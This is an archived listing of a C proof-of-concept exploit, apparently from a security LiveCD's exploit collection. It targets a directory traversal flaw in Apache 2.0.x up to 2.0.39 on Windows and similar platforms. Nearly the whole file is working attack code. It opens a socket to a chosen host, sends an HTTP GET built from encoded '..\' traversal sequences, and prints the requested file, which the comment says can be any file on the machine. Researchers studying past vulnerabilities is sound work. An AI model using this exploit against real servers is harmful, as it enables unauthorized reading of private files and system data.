home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / apache / DSR-apache2.0x.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  2.7 KB  |  127 lines
  1. /*
  2.  * DSR-apache2.0x by bob@dtors.net
  3.  * Exploit found by Auriemma Luigi.
  4.  * 
  5.  * This is Proof on Concept exploit for
  6.  * the current directory traversal design flaw 
  7.  * in apache 2.0.x - 2.0.39.
  8.  * 
  9.  * Affected Systems:
  10.  *
  11.  * Windows [win32]
  12.  * Netware
  13.  * OS2
  14.  * Cygwin
  15.  *
  16.  * This exploit allows the attacker to view ANY
  17.  * file on the target machine if it is vulnerable
  18.  * to this attack.
  19.  *
  20.  */
  21.  
  22. #include <stdio.h>
  23. #include <unistd.h>
  24. #include <string.h>
  25. #include <sys/socket.h>
  26. #include <netinet/in.h>
  27. #include <netdb.h>
  28. #define bs "%5c"
  29.  
  30. char travcode[]= 
  31.   "\x25\x35\x63\x25\x32\x65\x25\x32\x65"
  32.   "\x25\x35\x63\x25\x32\x65\x25\x32\x65"
  33.   "\x25\x35\x63\x25\x32\x65\x25\x32\x65"
  34.   "\x25\x35\x63\x25\x32\x65\x25\x32\x65"
  35.   "\x25\x35\x63\x25\x32\x65\x25\x32\x65"
  36.   "\x25\x35\x63";
  37.  
  38. void reply(int sock);
  39.  
  40. void
  41. reply(int sock) 
  42. {
  43.   int n;
  44.   char recvbuf[1024];
  45.   fd_set rset;
  46.  
  47.   while (1)
  48.   {
  49.     FD_ZERO(&rset);
  50.     FD_SET(sock,&rset);
  51.     FD_SET(STDIN_FILENO,&rset);
  52.     select(sock+1,&rset,NULL,NULL,NULL);
  53.  
  54.     if (FD_ISSET(sock,&rset))
  55.     {
  56.       if((n=read(sock,recvbuf,1024)) <= 0)
  57.       {
  58.         printf("Connection closed by foreign ghost.\n");
  59.         exit(0);
  60.       }         
  61.  
  62.       recvbuf[n]=0;
  63.       printf("%s",recvbuf);
  64.     }                      
  65.  
  66.     if (FD_ISSET(STDIN_FILENO,&rset))
  67.     {
  68.       if((n=read(STDIN_FILENO,recvbuf,1024)) > 0)
  69.       {
  70.         recvbuf[n]=0;
  71.        //write(sock,recvbuf,n);
  72.       }
  73.     }
  74.   }
  75. }
  76.  
  77. int
  78. main(int argc, char *argv[])
  79. {
  80.   int sock;
  81.   char exp[1024];
  82.   struct in_addr addr;
  83.   struct sockaddr_in sin;
  84.   struct hostent *he;
  85.  
  86.   fprintf(stdout, "\n\tDSR-apache2.0x.c By bob.\n"); 
  87.   fprintf(stdout, "Proof Of Concept Code for Apache 2.0.x 2.0.39\n");
  88.   fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n");
  89.  
  90.   if(argc<4) 
  91.   {
  92.     fprintf(stderr, "\nUsage : %s <host> <dir> <file>\n\n", argv[0]);
  93.     exit(1);
  94.   } 
  95.  
  96.   if ((he=gethostbyname(argv[1])) == NULL)
  97.   {
  98.     fprintf(stderr, "Cumon! Gimme some socks to put on!\n\n");
  99.     exit(1);
  100.   }
  101.  
  102.   /* A fresh pair of clean socks ;) */
  103.   sock=socket(AF_INET, SOCK_STREAM, 0);
  104.   bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
  105.   sin.sin_family=AF_INET;
  106.   sin.sin_port=htons(80);
  107.  
  108.   /* yummy fresh smelling */
  109.   fprintf(stdout, "Hold up bish connecting to host... \n");
  110.   if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
  111.   {
  112.     fprintf(stderr, "My socks are all sweaty.\n");
  113.     exit(1);
  114.   } else {
  115.     /* im exhausted after that...gn */
  116.     sleep(3);
  117.  
  118.     sprintf(exp, "GET /error/%s%s%s%s HTTP/1.1\r\nHost: %s\r\n\r\n" ,travcode, argv[2], bs, argv[3], argv[1]);    
  119.     write(sock,exp,strlen(exp));
  120.  
  121.     fprintf(stdout, "This is not going to be pritty.\nIm a lion here me ROAR!\n\n");
  122.     reply(sock);
  123.  
  124.     close(sock);
  125.     exit (0);
  126.   }
  127. }